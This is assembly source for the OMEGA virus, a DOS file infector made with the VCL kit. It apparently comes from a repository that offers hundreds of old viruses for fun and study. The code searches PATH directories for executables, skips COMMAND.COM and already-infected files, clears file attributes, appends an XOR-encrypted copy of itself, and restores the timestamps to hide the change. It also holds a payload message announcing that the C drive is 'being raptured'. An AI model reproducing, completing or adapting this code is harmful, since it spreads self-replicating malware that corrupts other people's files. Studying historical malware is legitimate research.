omega1.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

		scasb				; Compare it to the environment
		jne	find_path		; If there not equal try again
		loop	check_next_4		; Otherwise keep checking

		mov	word ptr [path_ad],di	; Save the PATH address for later
		mov	word ptr [path_ad + 2],es  ; Save PATH's segment for later
		ret				; Return to caller

path_string	db	"PATH="			; The PATH string to search for
path_ad		dd	?			; Holds the PATH's address
traverse_path	endp

found_subdir	proc	near
		lds	si,dword ptr [path_ad]	; DS:SI points to the PATH
		lea	di,[bp - 70]		; DI points to the work buffer
		push	cs			; Transfer CS into ES for
		pop	es			; byte transfer
move_subdir:	lodsb				; Load the next byte into AL
		cmp	al,';'			; Have we reached a separator?
		je	moved_one		; If so we're done copying
		or	al,al			; Are we finished with the PATH?
		je	moved_last_one		; If so get out of here
		stosb				; Store the byte at ES:DI
		jmp	short move_subdir	; Keep transfering characters

moved_last_one:	xor	si,si			; Zero SI to signal completion
moved_one:	mov	word ptr es:[path_ad],si; Store SI in the path address
		ret				; Return to caller
found_subdir	endp

		db	0BFh,0C0h,0BDh,072h,05Fh


find_files	proc	near
		push	bp			; Save BP

		mov	ah,02Fh			; DOS get DTA function
		int	021h
		push	bx			; Save old DTA address

		mov	bp,sp			; BP points to local buffer
		sub	sp,128			; Allocate 128 bytes on stack

		push	dx			; Save file mask
		mov	ah,01Ah			; DOS set DTA function
		lea	dx,[bp - 128]		; DX points to buffer
		int	021h

		mov	ah,04Eh			; DOS find first file function
		mov	cx,00100111b		; CX holds all file attributes
		pop	dx			; Restore file mask
find_a_file:	int	021h
		jc	done_finding		; Exit if no files found
		call	infect_file		; Infect the file!
		jnc	done_finding		; Exit if no error
		mov	ah,04Fh			; DOS find next file function
		jmp	short find_a_file	; Try finding another file

done_finding:	mov	sp,bp			; Restore old stack frame
		mov	ah,01Ah			; DOS set DTA function
		pop	dx			; Retrieve old DTA address
		int	021h

		pop	bp			; Restore BP
		ret				; Return to caller
find_files	endp

		db	0A9h,06Bh,0DAh,081h,0AFh

infect_file	proc	near
		mov	ah,02Fh			; DOS get DTA address function
		int	021h
		mov	si,bx			; SI points to the DTA

		mov	byte ptr [set_carry],0	; Assume we'll fail

		cmp	word ptr [si + 01Ch],0	; Is the file > 65535 bytes?
		jne	infection_done		; If it is then exit

		cmp	word ptr [si + 025h],'DN'  ; Might this be COMMAND.COM?
		je	infection_done		; If it is then skip it

		cmp	word ptr [si + 01Ah],(finish - start)
		jb	infection_done		; If it's too small then exit

		mov	ax,03D00h		; DOS open file function, r/o
		lea	dx,[si + 01Eh]		; DX points to file name
		int	021h
		xchg	bx,ax			; BX holds file handle

		mov	ah,03Fh			; DOS read from file function
		mov	cx,4			; CX holds bytes to read (4)
		mov	dx,offset buffer	; DX points to buffer
		int	021h

		mov	ah,03Eh			; DOS close file function
		int	021h

		push	si			; Save DTA address before compare
		mov	si,offset buffer	; SI points to comparison buffer
		mov	di,offset flag		; DI points to virus flag
		mov	cx,4			; CX holds number of bytes (4)
	rep	cmpsb				; Compare the first four bytes
		pop	si			; Restore DTA address
		je	infection_done		; If equal then exit
		mov	byte ptr [set_carry],1	; Success -- the file is OK

		mov	ax,04301h		; DOS set file attrib. function
		xor	cx,cx			; Clear all attributes
		lea	dx,[si + 01Eh]		; DX points to victim's name
		int	021h

		mov	ax,03D02h		; DOS open file function, r/w
		int	021h
		xchg	bx,ax			; BX holds file handle

		push	si			; Save SI through call
		call	encrypt_code		; Write an encrypted copy
		pop	si			; Restore SI

		mov	ax,05701h		; DOS set file time function
		mov	cx,[si + 016h]		; CX holds old file time
		mov	dx,[si + 018h]		; DX holds old file date
		int	021h

		mov	ah,03Eh			; DOS close file function
		int	021h

		mov	ax,04301h		; DOS set file attrib. function
		xor	ch,ch			; Clear CH for file attribute
		mov	cl,[si + 015h]		; CX holds file's old attributes
		lea	dx,[si + 01Eh]		; DX points to victim's name
		int	021h

infection_done:	cmp	byte ptr [set_carry],1	; Set carry flag if failed
		ret				; Return to caller

buffer		db	4 dup (?)		; Buffer to hold test data
set_carry	db	?			; Set-carry-on-exit flag
infect_file	endp


		db	0F1h,0F6h,003h,06Bh,099h

get_day         proc	near
		mov	ah,02Ah			; DOS get date function
		int	021h
		mov	al,dl			; Copy day into AL
		cbw				; Sign-extend AL into AX
		ret				; Return to caller
get_day         endp

		db	0CDh,005h,004h,026h,0CFh

get_hour        proc	near
		mov	ah,02Ch			; DOS get time function
		int	021h
		mov	al,ch			; Copy hour into AL
		cbw				; Sign-extend AL into AX
		ret				; Return to caller
get_hour        endp

		db	0F3h,06Ah,0F8h,002h,08Ah

get_month       proc	near
		mov	ah,02Ah			; DOS get date function
		int	021h
		mov	al,dh			; Copy month into AL
		cbw				; Sign-extend AL into AX
		ret				; Return to caller
get_month       endp

		db	0A8h,000h,015h,081h,0E7h

get_second      proc	near
		mov	ah,02Ch			; DOS get time function
		int	021h
		mov	al,dh			; Copy second into AL
		cbw				; Sign-extend AL into AX
		ret				; Return to caller
get_second      endp

		db	03Fh,0FFh,089h,057h,0F2h

get_year        proc	near
		mov	ah,02Ah			; DOS get date function
		int	021h
		xchg	cx,ax			; Transfer the year into AX
		ret				; Return to caller
get_year        endp

data00:
db        "Says the OMEGA virus:"
		
db                      "It has been nice playing these games with you,
db                              "...but now it is all over."
db              "[...I am the Alpha and the Omega, the begining and the end.]"
db                                                                "-Rev 22:6"
db              "Your C drive is being raptured!"
		
db                                      "[...It is finished...]"
db                                              "-Rev 16:17"
		
         
db                                              "____________"
db                                             "/            \"
db                                            "|              |"
db                                            "|              |" 
db                                            "|              |"
db                                      "\      \            /      /"
db                                        "\______\        /______/"
		
db                                               "Omega"
db                                                    "(The End)"

vcl_marker	db	"[VCL]",0		; VCL creation marker

encrypt_code	proc	near
		mov	si,offset encrypt_decrypt; SI points to cipher routine

		xor	ah,ah			; BIOS get time function
		int	01Ah
		mov	word ptr [si + 8],dx	; Low word of timer is new key

		xor	byte ptr [si],1		;
		xor	byte ptr [si + 7],1	; Change all SIs to DIs
		xor	word ptr [si + 10],0101h; (and vice-versa)

		mov	di,offset finish	; Copy routine into heap
		mov	cx,finish - encrypt_decrypt - 1  ; All but final RET
		push	si			; Save SI for later
		push	cx			; Save CX for later
	rep	movsb				; Copy the bytes

		mov	si,offset write_stuff	; SI points to write stuff
		mov	cx,5			; CX holds length of write
	rep	movsb				; Copy the bytes

		pop	cx			; Restore CX
		pop	si			; Restore SI
		inc	cx			; Copy the RET also this time
	rep	movsb				; Copy the routine again

		mov	ah,040h			; DOS write to file function
		mov	dx,offset start		; DX points to virus

		call	finish			; Encrypt/write/decrypt

		ret				; Return to caller

write_stuff:	mov	cx,finish - start	; Length of code
		int	021h
encrypt_code	endp

end_of_code	label	near

encrypt_decrypt	proc	near
		mov	si,offset start_of_code ; SI points to code to decrypt
		mov	cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop:	db	081h,034h,00h,00h	; XOR a word by the key
		inc	si			; Do the next word
		inc	si			;
		loop	xor_loop		; Loop until we're through
		ret				; Return to caller
encrypt_decrypt	endp
finish		label	near

code		ends
		end	main